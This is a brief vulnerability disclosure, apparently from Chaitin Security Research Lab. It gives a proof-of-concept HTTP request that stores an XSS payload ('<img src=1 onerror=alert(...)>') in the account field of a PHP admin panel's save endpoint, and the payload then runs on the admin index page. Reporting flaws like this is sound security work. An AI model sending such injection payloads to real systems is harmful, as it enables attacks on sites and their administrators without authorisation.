Found by Chaitin Security Research Lab
URL: http://192.168.3.129:8091/admin1#admin/index

PoC:

```http
POST /admin1/admin/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 224
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/admin/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","cover":"","account":"test<img src=1 onerror=alert("xss");>","email":"aa@xxxqq.com","nickname":"aa@xxxqq.com","login_count":"","group_id":1,"password":"aa@xxxqq.com","status":1,"create_time":"","theme":"template"}
```

Then the XSS can be viewed at the URL:

http://192.168.3.129:8091/admin1#admin/index